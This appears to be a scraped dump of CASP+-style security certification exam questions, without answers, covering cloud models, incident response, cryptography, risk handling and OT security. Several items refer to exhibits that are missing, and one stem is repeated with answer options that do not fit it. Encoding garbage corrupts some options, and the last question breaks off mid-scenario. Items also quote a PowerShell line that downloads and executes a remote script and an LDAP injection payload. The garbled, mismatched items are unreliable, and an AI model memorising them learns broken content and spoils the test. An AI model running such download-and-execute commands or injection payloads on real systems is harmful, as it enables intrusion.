Which of the following should the architect recommend to ensure all requirements are met in the MOST secure manner? (Choose two.) A. Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443 B. Add the following to Firewall_A: 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443 C. Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535 D. Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535 E. Add the following to Firewall_B: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535 F. Add the following to Firewall_B: 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443.
As part of the customer registration process to access a new bank account, customers are required to upload a number of documents, including their passports and driver's licenses. The process also requires customers to take a current photo of themselves to be compared against provided documentation.
Which of the following BEST describes this process? A. Deepfake B. Know your customer C. Identity proofing D. Passwordless.
A user from the sales department opened a suspicious file attachment. The sales department then contacted the SOC to investigate a number of unresponsive systems, and the team successfully identified the file and the origin of the attack.
Which of the following is the NEXT step of the incident response plan? A. Remediation B. Containment C. Response D. Recovery.
A recent data breach stemmed from unauthorized access to an employee's company account with a cloud-based productivity suite. The attacker exploited excessive permissions granted to a third-party OAuth application to collect sensitive information.
Which of the following BEST mitigates inappropriate access and permissions issues? A. SIEM B. CASB C. WAF D. SOAR.
A security engineer is hardening a company's multihomed SFTP server. When scanning a public-facing network interface, the engineer finds the following ports are open:
✑ 25
✑ 110
✑ 137
✑ 138
✑ 139
✑ 445
Internal Windows clients are used to transferring files to the server to stage them for customer download as part of the company's distribution process.
Which of the following would be the BEST solution to harden the system? A. Close ports 110, 138, and 139. Bind ports 22, 25, and 137 to only the internal interface. B. Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface. C. Close ports 22 and 139. Bind ports 137, 138, and 445 to only the internal interface. D. Close ports 22, 137, and 138. Bind ports 110 and 445 to only the internal interface.
A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes.
Which of the following should a security architect recommend? A. A DLP program to identify which files have customer data and delete them B. An ERP program to identify which processes need to be tracked C. A CMDB to report on systems that are not configured to security baselines D. A CRM application to consolidate the data and provision access based on the process and need.
A security analyst observes the following while looking through network traffic in a company's cloud log:Which of the following steps should the security analyst take FIRST? A. Quarantine 10.0.5.52 and run a malware scan against the host. B. Access 10.0.5.52 via EDR and identify processes that have network connections. C. Isolate 10.0.50.6 via security groups. D. Investigate web logs on 10.0.50.6 to determine if this is normal traffic.
A security analyst observes the following while looking through network traffic in a company's cloud log:Which of the following steps should the security analyst take FIRST? A. Isolation control failure B. Management plane breach C. Insecure data deletion D. Resource exhaustion.
An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment's notice.
Which of the following should the organization consider FIRST to address this requirement? A. Implement a change management plan to ensure systems are using the appropriate versions. B. Hire additional on-call staff to be deployed if an event occurs. C. Design an appropriate warm site for business continuity. D. Identify critical business processes and determine associated software and hardware requirements.
Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted: A. when it is passed across a local network. B. in memory during processing C. when it is written to a system's solid-state drive. D. by an enterprise hardware security module.
A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements:
✑ Support all phases of the SDLC.
✑ Use tailored website portal software.
✑ Allow the company to build and use its own gateway software.
✑ Utilize its own data management platform.
✑ Continue using agent-based security tools.
Which of the following cloud-computing models should the CIO implement? A. SaaS B. PaaS C. MaaS D. IaaS.
A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.
Which of the following BEST describes the type of malware the solution should protect against? A. Worm B. Logic bomb C. Fileless D. Rootkit.
A development team created a mobile application that contacts a company's back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.
Which of the following would BEST safeguard the APIs? (Choose two.) A. Bot protection B. OAuth 2.0 C. Input validation D. Autoscaling endpoints E. Rate limiting F. CSRF protection.
An organization's existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.
Which of the following designs would be BEST for the CISO to use? A. Adding a second redundant layer of alternate vendor VPN concentrators B. Using Base64 encoding within the existing site-to-site VPN connections C. Distributing security resources across VPN sites D. Implementing IDS services with each VPN concentrator E. Transitioning to a container-based architecture for site-based services.
A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government.
Which of the following should be taken into consideration during the process of releasing the drive to the government? A. Encryption in transit B. Legal issues C. Chain of custody D. Order of volatility E. Key exchange.
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell `IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois`
Which of the following security controls would have alerted and prevented the next phase of the attack? A. Antivirus and UEBA B. Reverse proxy and sandbox C. EDR and application approved list D. Forward proxy and MFA.
As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents.
Which of the following BEST describes this kind of risk response? A. Risk rejection B. Risk mitigation C. Risk transference D. Risk avoidance.
A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system.
Which of the following security responsibilities will the DevOps team need to perform? A. Securely configure the authentication mechanisms. B. Patch the infrastructure at the operating system. C. Execute port scanning against the services. D. Upgrade the service as part of life-cycle management.
A company's Chief Information Officer wants to implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide analysis of malicious activities to determine the processes or users involved.
Which of the following would provide this information? A. HIPS B. UEBA C. HIDS D. NIDS.
The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight.
Which of the following testing methods would be BEST for the engineer to utilize in this situation? A. Software composition analysis B. Code obfuscation C. Static analysis D. Dynamic analysis.
A forensic investigator would use the foremost command for: A. cloning disks. B. analyzing network-captured packets.
C. recovering lost files. D. extracting features such as email addresses.
A software company is developing an application in which data must be encrypted with a cipher that requires the following:
✑ Initialization vector
✑ Low latency
✑ Suitable for streaming
Which of the following ciphers should the company use? A. Cipher feedback B. Cipher block chaining message authentication code C. Cipher block chaining D. Electronic codebook.
An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of self-healing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software.
During the incident, when the self-healing system attempted to restart the services, available disk space on the data drive to restart all the services was inadequate. The self-healing system did not detect that some services did not fully restart and declared the system as fully operational.
Which of the following BEST describes the reason why the silent failure occurred? A. The system logs rotated prematurely. B. The disk utilization alarms are higher than what the service restarts require. C. The number of nodes in the self-healing cluster was healthy. D. Conditional checks prior to the service restart succeeded.
A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication.
Which of the following technologies would BEST meet this need? A. Faraday cage B. WPA2 PSK C. WPA3 SAE D. WEP 128 bit.
An attack team performed a penetration test on a new smart card system. The team demonstrated that by subjecting the smart card to high temperatures, the secret key could be revealed.
Which of the following side-channel attacks did the team use? A. Differential power analysis B. Differential fault analysis C. Differential temperature analysis D. Differential timing analysis.
A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.
Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant? A. NAC to control authorized endpoints B. FIM on the servers storing the data C. A jump box in the screened subnet D. A general VPN solution to the primary network.
A networking team was asked to provide secure remote access to all company employees. The team decided to use client-to-site VPN as a solution. During a discussion, the Chief Information Security Officer raised a security concern and asked the networking team to route the Internet traffic of remote users through the main office infrastructure. Doing this would prevent remote users from accessing the Internet through their local networks while connected to the VPN.
Which of the following solutions does this describe? A. Full tunneling B. Asymmetric routing C. SSH tunneling D. Split tunneling.
A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests:
(&(objectClass=*)(objectClass=*))(&(objectClass=void)(type=admin))
Which of the following would BEST mitigate this vulnerability? A. Network intrusion prevention B. Data encoding C. Input validation D. CAPTCHA.
A security consultant needs to protect a network of electrical relays that are used for monitoring and controlling the energy used in a manufacturing facility.
Which of the following systems should the consultant review before making a recommendation? A. CAN B. ASIC C. FPGA D. SCADA.
Company A acquired Company ׀’. During an audit, a security engineer found Company B's environment was inadequately patched. In response, Company A placed a firewall between the two environments until Company B's infrastructure could be integrated into Company A's security program.
Which of the following risk-handling techniques was used? A. Accept B. Avoid C. Transfer D. Mitigate.
An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but the organization was able to successfully apply mitigations to reduce the likelihood of impact.
Which of the following should the organization perform NEXT? A. Assess the residual risk. B. Update the organization's threat model. C. Move to the next risk in the register. D. Recalculate the magnitude of impact.
A software house is developing a new application. The application has the following requirements:
✑ Reduce the number of credential requests as much as possible
✑ Integrate with social networks
✑ Authenticate users
Which of the following is the BEST federation method to use for the application? A. WS-Federation B. OpenID C. OAuth D. SAML.
A company is looking for a solution to hide data stored in databases. The solution must meet the following requirements:
✑ Be efficient at protecting the production environment
✑ Not require any change to the application
✑ Act at the presentation layer
Which of the following techniques should be used? A. Masking B. Tokenization C. Algorithmic D. Random substitution.
A forensic expert working on a fraud investigation for a US-based company collected a few disk images as evidence.
Which of the following offers an authoritative decision about whether the evidence was obtained legally?
A. Lawyers B. Court C. Upper management team D. Police.
Technicians have determined that the current server hardware is outdated, so they have decided to throw it out.
Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered? A. Drive wiping B. Degaussing C. Purging D. Physical destruction.
A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence.
Which of the following techniques would BEST support this? A. Configuring systemd services to run automatically at startup
B. Creating a backdoor C. Exploiting an arbitrary code execution exploit D. Moving laterally to a more authoritative server/service.
A security architect for a large, multinational manufacturer needs to design and implement a security solution to monitor traffic.
When designing the solution, which of the following threats should the security architect focus on to prevent attacks against the ׀׀¢ network? A. Packets that are the wrong size or length B. Use of any non-DNP3 communication on a DNP3 port C. Multiple solicited responses over time D. Application of an unsupported encryption algorithm.
A security administrator configured the account policies per security implementation guidelines. However, the accounts still appear to be susceptible to brute-force attacks. The following settings meet the existing compliance guidelines:
✑ Must have a minimum of 15 characters
✑ Must use one number
✑ Must use one capital letter
✑ Must not be one of the last 12 passwords used
Which of the following policies should be added to provide additional security? A. Shared accounts B. Password complexity C. Account lockout D. Password history E. Time-based logins.
A cybersecurity analyst discovered a private key that could have been exposed.
Which of the following is the BEST way for the analyst to determine if the key has been compromised? A. HSTS B. CRL C. CSRs D. OCSP.
Which of the following technologies allows CSPs to add encryption across multiple data storages? A. Symmetric encryption B. Homomorphic encryption C. Data dispersion D. Bit splitting.
A vulnerability scanner detected an obsolete version of an open-source file-sharing application on one of a company's Linux servers. While the software version is no longer supported by the OSS community, the company's Linux vendor backported fixes, applied them for all current vulnerabilities, and agrees to support the software in the future.
Based on this agreement, this finding is BEST categorized as a: A. true positive. B. true negative. C. false positive. D. false negative.
A company's Chief Information Security Officer is concerned that the company's proposed move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC.
Which of the following compensating controls would be BEST to implement in this situation? A. EDR B. SIEM C. HIDS D. UEBA.
A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who are no longer with the organization.
The legal department -
provided the security team with a list of search terms to investigate.
This is an example of: A. due diligence. B. e-discovery. C. due care. D. legal hold.
Which of the following protocols is a low power, low data rate that allows for the creation of PAN networks? A. Zigbee B. CAN
C. DNP3 D. Modbus.
An organization's assessment of a third-party, non-critical vendor reveals that the vendor does not have cybersecurity insurance and IT staff turnover is high. The organization uses the vendor to move customer office equipment from one service location to another. The vendor acquires customer data and access to the business via an API.
Given this information, which of the following is a noted risk? A. Feature delay due to extended software development cycles B. Financial liability from a vendor data breach C. Technical impact to the API configuration D. The possibility of the vendor's business ceasing operations.
A company wants to quantify and communicate the effectiveness of its security controls but must establish measures. Which of the following is MOST likely to be included in an effective assessment roadmap for these controls? A. Create a change management process. B. Establish key performance indicators. C. Create an integrated master schedule. D. Develop a communication plan. E. Perform a security control assessment.
A bank is working with a security architect to find the BEST solution to detect database management system compromises. The solution should meet the following requirements:
✑ Work at the application layer
✑ Send alerts on attacks from both privileged and malicious users
✑ Have a very low false positive
Which of the following should the architect recommend? A. FIM B. WAF C. NIPS D. DAM E. UTM.
A business wants to migrate its workloads from an exclusively on-premises IT infrastructure to the cloud but cannot implement all the required controls. Which of the following BEST describes the risk associated with this implementation? A. Loss of governance B. Vendor lockout C. Compliance risk D. Vendor lock-in.
A security architect needs to implement a CASB solution for an organization with a highly distributed remote workforce. One of the requirements for the implementation includes the capability to discover SaaS applications and block access to those that are unapproved or identified as risky. Which of the following would BEST achieve this objective? A. Deploy endpoint agents that monitor local web traffic to enforce DLP and encryption policies. B. Implement cloud infrastructure to proxy all user web traffic to enforce DLP and encryption policies. C. Implement cloud infrastructure to proxy all user web traffic and control access according to centralized policy. D. Deploy endpoint agents that monitor local web traffic and control access according to centralized policy.
During a phishing exercise, a few privileged users ranked high on the failure list. The enterprise would like to ensure that privileged users have an extra security- monitoring control in place. Which of the following is the MOST likely solution? A. A WAF to protect web traffic B. User and entity behavior analytics C. Requirements to change the local password D. A gap analysis.
An analyst is evaluating the security of a web application that does not hold sensitive or financial data. The application requires users to have a minimum password length of 12 characters. One of the characters must be capitalized, and one must be a number. To reset the password, the user is asked to provide the birthplace, birthdate, and mother's maiden name. When all of these are entered correctly, a new password is emailed to the user. Which of the following should concern the analyst the MOST? A. The security answers may be determined via online reconnaissance. B. The password is too long, which may encourage users to write the password down. C. The password should include a special character. D. The minimum password length is too short.
In a cloud environment, the provider offers relief to an organization's teams by sharing in many of the operational duties. In a shared responsibility model, which of the following responsibilities belongs to the provider in a PaaS implementation? A. Application-specific data assets B. Application user access management C. Application-specific logic and code D. Application/platform software.
An analyst received a list of IOCs from a government agency. The attack has the following characteristics:
1. The attack starts with bulk phishing.
2. If a user clicks on the link, a dropper is downloaded to the computer.
3. Each of the malware samples has unique hashes tied to the user.
The analyst needs to identify whether existing endpoint controls are effective. Which of the following risk mitigation techniques should the analyst use? A. Update the incident response plan. B. Blocklist the executable. C. Deploy a honeypot onto the laptops. D. Detonate in a sandbox.
An organization's finance system was recently attacked. A forensic analyst is reviewing the contents of the compromised files for credit card data. Which of the following commands should the analyst run to BEST determine whether financial data was lost? A. grep ג€"v '^4 [0ג€"9] {12} (?:[0ג€"9]{3}) ?$' file B. grep '^4 [0ג€"9]{12}(?:[0ג€"9]{3})?$' file C. grep '^6(?:011|5[0ג€"9]{2}) [0ג€"9] {12} ?' file D. grep ג€"v '^6(?:011|5[0ג€"9]{2})[0ג€"9]{12}?' file.
An organization requires a contractual document that includes:
✑ An overview of what is covered
✑ Goals and objectives
✑ Performance metrics for each party
✑ A review of how the agreement is managed by all parties
Which of the following BEST describes this type of contractual document A. SLA B. BAA
C. NDA D. ISA.
A company based in the United States holds insurance details of EU citizens. Which of the following must be adhered to when processing EU citizens' personal, private, and confidential data? A. The principle of lawful, fair, and transparent processing B. The right to be forgotten principle of personal data erasure requests C. The non-repudiation and deniability principle D. The principle of encryption, obfuscation, and data masking.
A security analyst is evaluating the security of an online customer banking system. The analyst has a 12-character password for the test account. At the login screen, the analyst is asked to enter the third, eighth, and eleventh characters of the password. Which of the following describes why this request is a security concern? (Choose two.) A. The request is evidence that the password is more open to being captured via a keylogger. B. The request proves that salt has not been added to the password hash, thus making it vulnerable to rainbow tables. C. The request proves the password is encoded rather than encrypted and thus less secure as it can be easily reversed. D. The request proves a potential attacker only needs to be able to guess or brute force three characters rather than 12 characters of the password. E. The request proves the password is stored in a reversible format, making it readable by anyone at the bank who is given access. F. The request proves the password must be in cleartext during transit, making it open to on-path attacks.
A company launched a new service and created a landing page within its website network for users to access the service. Per company policy, all websites must utilize encryption for any authentication pages. A junior network administrator proceeded to use an outdated procedure to order new certificates. Afterward, customers are reporting the following error when accessing a new web page: NET:ERR_CERT_COMMON_NAME_INVALID. Which of the following BEST describes what the administrator should do NEXT? A. Request a new certificate with the correct subject alternative name that includes the new websites. B. Request a new certificate with the correct organizational unit for the company's website. C. Request a new certificate with a stronger encryption strength and the latest cipher suite. D. Request a new certificate with the same information but including the old certificate on the CRL.
A large number of emails have been reported, and a security analyst is reviewing the following information from the emails: As part of the triage process, which of the following is the FIRST step the analyst should take? A. Block the email address carl.b@comptia1.com, as it is sending spam to subject matter experts. B. Validate the final ג€Receivedג€ header against the DNS entry of the domain. C. Compare the ג€Return-Pathג€ and ג€Receivedג€ fields.
D. Ignore the emails, as SPF validation is successful, and it is a false positive.
Which of the following is the BEST disaster recovery solution when resources are running in a cloud environment? A. Remote provider BCDR B. Cloud provider BCDR C. Alternative provider BCDR D. Primary provider BCDR.
An auditor is reviewing the logs from a web application to determine the source of an incident. The web application architecture includes an Internet-accessible application load balancer, a number of web servers in a private subnet, application servers, and one database server in a tiered configuration. The application load balancer cannot store the logs. The following are sample log snippets:Which of the following should the auditor recommend to ensure future incidents can be traced back to the sources? A. Enable the X-Forwarded-For header at the load balancer. B. Install a software-based HIDS on the application servers. C. Install a certificate signed by a trusted CA. D. Use stored procedures on the database server. E. Store the value of the $_SERVER['REMOTE_ADDR'] received by the web servers.
Due to internal resource constraints, the management team has asked the principal security architect to recommend a solution that shifts partial responsibility for application-level controls to the cloud provider. In the shared responsibility model, which of the following levels of service meets this requirement? A. IaaS B. SaaS C. FaaS D. PaaS.
A security analyst needs to recommend a remediation to the following threat:Which of the following actions should the security analyst propose to prevent this successful exploitation? A. Patch the system. B. Update the antivirus. C. Install a host-based firewall. D. Enable TLS 1.2.
An organization requires a legacy system to incorporate reference data into a new system. The organization anticipates the legacy system will remain in operation for the next 18 to 24 months. Additionally, the legacy system has multiple critical vulnerabilities with no patches available to resolve them. Which of the following is the BEST design option to optimize security? A. Limit access to the system using a jump box. B. Place the new system and legacy system on separate VLANs. C. Deploy the legacy application on an air-gapped system. D. Implement MFA to access the legacy system.
An attacker infiltrated an electricity-generation site and disabled the safety instrumented system. Ransomware was also deployed on the engineering workstation.
The environment has back-to-back firewalls separating the corporate and OT systems. Which of the following is the MOST likely security consequence of this attack? A. A turbine would overheat and cause physical harm. B. The engineers would need to go to the historian. C. The SCADA equipment could not be maintained. D. Data would be exfiltrated through the data diodes.
Which of the following is required for an organization to meet the ISO 27018 standard? A. All PII must be encrypted. B. All network traffic must be inspected.
C. GDPR equivalent standards must be met.
D. COBIT equivalent standards must be met.
A company invested a total of $10 million for a new storage solution installed across five on-site datacenters. Fifty percent of the cost of this investment was for solid-state storage. Due to the high rate of wear on this storage, the company is estimating that 5% will need to be replaced per year. Which of the following is the
ALE due to storage replacement? A. $50,000 B. $125,000 C. $250,000 D. $500,000 E. $1,000,000.
A security architect was asked to modify an existing internal network design to accommodate the following requirements for RDP:
✑ Enforce MFA for RDP.
✑ Ensure RDP connections are only allowed with secure ciphers.
The existing network is extremely complex and not well segmented. Because of these limitations, the company has requested that the connections not be restricted by network-level firewalls or ACLs.
Which of the following should the security architect recommend to meet these requirements? A. Implement a reverse proxy for remote desktop with a secure cipher configuration enforced. B. Implement a bastion host with a secure cipher configuration enforced. C. Implement a remote desktop gateway server, enforce secure ciphers, and configure to use OTP. D. Implement a GPO that enforces TLS cipher suites and limits remote desktop access to only VPN users.
An organization is deploying a new, online digital bank and needs to ensure availability and performance. The cloud-based architecture is deployed using PaaS and SaaS solutions, and it was designed with the following considerations:
✑ Protection from DoS attacks against its infrastructure and web applications is in place.
✑ Highly available and distributed DNS is implemented.
✑ Static content is cached in the CDN.
✑ A WAF is deployed inline and is in block mode.
✑ Multiple public clouds are utilized in an active-passive architecture.
With the above controls in place, the bank is experiencing a slowdown on the unauthenticated payments page. Which of the following is the MOST likely cause? A. The public cloud provider is applying QoS to the inbound customer traffic. B. The API gateway endpoints are being directly targeted. C. The site is experiencing a brute-force credential attack. D. A DDoS attack is targeted at the CDN.
A healthcare system recently suffered from a ransomware incident. As a result, the board of directors decided to hire a security consultant to improve existing network security. The security consultant found that the healthcare network was completely flat, had no privileged access limits, and had open RDP access to servers with personal health information. As the consultant builds the remediation plan, which of the following solutions would BEST solve these challenges?
(Choose three.) A. SD-WAN B. PAM C. Remote access VPN D. MFA E. Network segmentation F. BGP G. NAC.
A Chief Information Security Officer (CISO) is concerned that a company's current data disposal procedures could result in data remanence. The company uses only SSDs. Which of the following would be the MOST secure way to dispose of the SSDs given the CISO's concern? A. Degaussing B. Overwriting C. Shredding D. Formatting E. Incinerating.
The CI/CD pipeline requires code to have close to zero defects and zero vulnerabilities. The current process for any code releases into production uses two-week
Agile sprints. Which of the following would BEST meet the requirement? A. An open-source automation server
B. A static code analyzer C. Trusted open-source libraries D. A single code repository for all developers.
A security analyst wants to keep track of all outbound web connections from workstations. The analyst's company uses an on-premises web filtering solution that forwards the outbound traffic to a perimeter firewall. When the security analyst gets the connection events from the firewall, the source IP of the outbound web traffic is the translated IP of the web filtering solution. Considering this scenario involving source NAT, which of the following would be the BEST option to inject in the HTTP header to include the real source IP from workstations? A. X-Forwarded-Proto
B. X-Forwarded-For C. Cache-Control D. Strict-Transport-Security E. Content-Security-Policy.
An HVAC contractor requested network connectivity permission to remotely support/troubleshoot equipment issues at a company location. Currently, the company does not have a process that allows vendors remote access to the corporate network. Which of the following solutions represents the BEST course of action to allow the contractor access? A. Add the vendor's equipment to the existing network. Give the vendor access through the standard corporate VPN.
B. Give the vendor a standard desktop PC to attach the equipment to. Give the vendor access through the standard corporate VPN. C. Establish a certification process for the vendor. Allow certified vendors access to the VDI to monitor and maintain the HVAC equipment. D. Create a dedicated segment with no access to the corporate network. Implement dedicated VPN hardware for vendor access.
An attacker infiltrated the code base of a hardware manufacturer and inserted malware before the code was compiled. The malicious code is now running at the hardware level across a number of industries and sectors. Which of the following categories BEST describes this type of vendor risk? A. SDLC attack B. Side-load attack C. Remote code signing D. Supply chain attack.
A company is adopting a new artificial-intelligence-based analytics SaaS solution. This is the company's first attempt at using a SaaS solution, and a security architect has been asked to determine any future risks. Which of the following would be the GREATEST risk in adopting this solution? A. The inability to assign access controls to comply with company policy B. The inability to require the service provider process data in a specific country C. The inability to obtain company data when migrating to another service
D. The inability to conduct security assessments against a service provider.
A BIA of a popular online retailer identified several mission-essential functions that would take more than seven days to recover in the event of an outage. Which of the following should be considered when setting priorities for the restoration of these functions? A. Supply chain issues B. Revenue generation C. Warm-site operations D. Scheduled impacts to future projects.
A software development company makes its software version available to customers from a web portal. On several occasions, hackers were able to access the software repository to change the package that is automatically published on the website. Which of the following would be the technique to ensure the software the users download is the official software released by the company? A. Distribute the software via a third-party repository. B. Close the web repository and deliver the software via email. C. Email the software link to all customers. D. Display the SHA checksum on the website.
An organization decided to begin issuing corporate mobile device users microSD HSMs that must be installed in the mobile devices in order to access corporate resources remotely. Which of the following features of these devices MOST likely led to this decision? (Choose two.) A. Software-backed keystore B. Embedded cryptoprocessor C. Hardware-backed public key storage D. Support for stream ciphers E. Decentralized key management F. TPM 2.0 attestation services.
A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program. A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very old and outdated OSs. Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure? A. Segment the systems to reduce the attack surface if an attack occurs. B. Migrate the services to new systems with a supported and patched OS. C. Patch the systems to the latest versions of the existing OSs. D. Install anti-malware, HIPS, and host-based firewalls on each of the systems.
A company was recently infected by malware. During the root cause analysis, the company determined that several users were installing their own applications.
To prevent further compromises, the company has decided it will only allow authorized applications to run on its systems. Which of the following should the company implement? A. Signing B. Access control C. HIPS D. Permit listing.
A security analyst is reviewing the following vulnerability assessment report:Which of the following should be patched FIRST to minimize attacks against Internet-facing hosts? A. Server1 B. Server2 C. Server3 D. Server4.
An organization is researching the automation capabilities for systems within an OT network. A security analyst wants to assist with creating secure coding practices and would like to learn about the programming languages used on the PLCs. Which of the following programming languages is the MOST relevant for
PLCs? A. Ladder logic
B. Rust C. C D. Python E. Java.
A security analyst sees that a hacker has discovered some keys and they are being made available on a public website. The security analyst is then able to successfully decrypt that data using the keys from the website. Which of the following should the security analyst recommend to protect the affected data A. Key rotation
B. Key revocation C. Key escrow D. Zeroization E: Cryptographic obfuscation.
A company would like to obfuscate PII data accessed by an application that is housed in a database to prevent unauthorized viewing. Which of the following should the company do to accomplish this goal? A. Use cell-level encryption. B. Mask the data. C. Implement a DLP solution. D. Utilize encryption at rest.
A security engineer needs to implement a CASB to secure employee user web traffic. A key requirement is that the relevant event data must be collected from existing on-premises infrastructure components and consumed by the CASB to expand traffic visibility. The solution must be highly resilient to network outages.
Which of the following architectural components would BEST meet these requirements? A. Log collection B. Reverse proxy C. A WAF D. API mode.
A company security engineer arrives at work to face the following scenario:
1. Website defacement
2. Calls from the company president indicating the website needs to be fixed immediately because it is damaging the brand
3. A job offer from the company's competitor
4. A security analyst's investigative report, based on logs from the past six months, describing how lateral movement across the network from various IP addresses originating from a foreign adversary country resulted in exfiltrated data
Which of the following threat actors is MOST likely involved? A. Organized crime B. Script kiddie C. APT/nation-state D. Competitor.
A company wants to improve its active protection capabilities against unknown and zero-day malware. Which of the following is the MOST secure solution? A. NIDS B. Application allow list C. Sandbox detonation D. Endpoint log collection E. HIDS.
Which of the following BEST describe the importance of maintaining chain of custody in forensic evidence collection? (Choose two.) A. It increases the likelihood that evidence will be deemed admissible in court. B. It authenticates personnel who come in contact with evidence after collection. C. It ensures confidentiality and the need-to-know basis of forensically acquired evidence. D. It attests to how recently evidence was collected by recording date/time attributes. E. It provides automated attestation for the integrity of the collected evidence. F. It ensures the integrity of the collected evidence.
A company just released a new video card. Due to limited supply and high demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems.
Which of the following now describes the level of risk? A. Inherent B. Low C. Mitigated D. Residual E. Transferred.
A vulnerability assessment endpoint generated a report of the latest findings. A security analyst needs to review the report and create a priority list of items that must be addressed. Which of the following should the analyst use to create the list quickly? A. Business Impact rating B. CVE dates C. CVSS scores
D. OVAL.
An organization collects personal data from its global customers. The organization determines how that data is going to be used, why it is going to be used, and how it is manipulated for business processes. Which of the following will the organization need in order to comply with GDPR? (Choose two.) A. Data processor B. Data custodian C. Data owner D. Data steward E. Data controller F. Data manager.
The Chief Executive Officer (CEO) of a small wholesaler with low margins is concerned about the use of a newly developed artificial intelligence algorithm being used in the organization's marketing tool. The tool can make automated purchasing approval decisions based on data provided by customers and collected from the Internet. Which of the following is MOST likely the concern? (Choose two.) A. Required computing power B. Cost to maintain C. Customer privacy D. Adversarial attacks E. Information bias F. Customer approval speed.
A company's finance department acquired a new payment system that exports data to an unencrypted file on the system. The company implemented controls on the file so only appropriate personnel are allowed access. Which of the following risk techniques did the department use in this situation? A. Accept B. Avoid C. Transfer D. Mitigate.
A security architect is given the following requirements to secure a rapidly changing enterprise with an increasingly distributed and remote workforce:
✑ Cloud-delivered services
✑ Full network security stack
✑ SaaS application security management
✑ Minimal latency for an optimal user experience
✑ Integration with the cloud IAM platform
Which of the following is the BEST solution? A. Routing and Remote Access Service (RRAS) B. NGFW C. Managed Security Service Provider (MSSP) D. SASE.
A user experiences an HTTPS connection error when trying to access an Internet banking website from a corporate laptop. The user then opens a browser on a mobile phone and is able to access the same Internet banking website without issue. Which of the following security configurations is MOST likely the cause of the error? A. HSTS B. TLS 1.2 C. Certificate pinning D. Client authentication.
An organization recently recovered from an attack that featured an adversary injecting malicious logic into OS bootloaders on endpoint devices. Therefore, the organization decided to require the use of TPM for measured boot and attestation, monitoring each component from the UEFI through the full loading of OS components. Which of the following TPM structures enables this storage functionality? A. Endorsement tickets B. Clock/counter structures C. Command tag structures with MAC schemes D. Platform configuration registers.
A developer wants to develop a secure, external-facing web application. The developer is looking for an online community that produces tools, methodologies, articles, and documentation in the field of web-application security. Which of the following is the BEST option? A. ICANN B. PCI DSS C. OWASP D. CSA E. NIST.
An administrator at a software development company would like to protect the integrity of the company's applications with digital signatures. The developers report that the signing process keeps failing on all applications. The same key pair used for signing, however, is working properly on the website, is valid, and is issued by a trusted CA. Which of the following is MOST likely the cause of the signature failing? A. The NTP server is set incorrectly for the developers. B. The CA has included the certificate in its CRL. C. The certificate is set for the wrong key usage. D. Each application is missing a SAN or wildcard entry on the certificate.
A company created an external, PHP-based web application for its customers. A security researcher reports that the application has the Heartbleed vulnerability.
Which of the following would BEST resolve and mitigate the issue? (Choose two.) A. Deploying a WAF signature B. Fixing the PHP code C. Changing the web server from HTTPS to HTTP D. Using SSLv3 E. Changing the code from PHP to ColdFusion F. Updating the OpenSSL library.
A security engineer is reviewing a record of events after a recent data breach incident that involved the following:
✑ A hacker conducted reconnaissance and developed a footprint of the company's Internet-facing web application assets.
✑ A vulnerability in a third-party library was exploited by the hacker, resulting in the compromise of a local account.
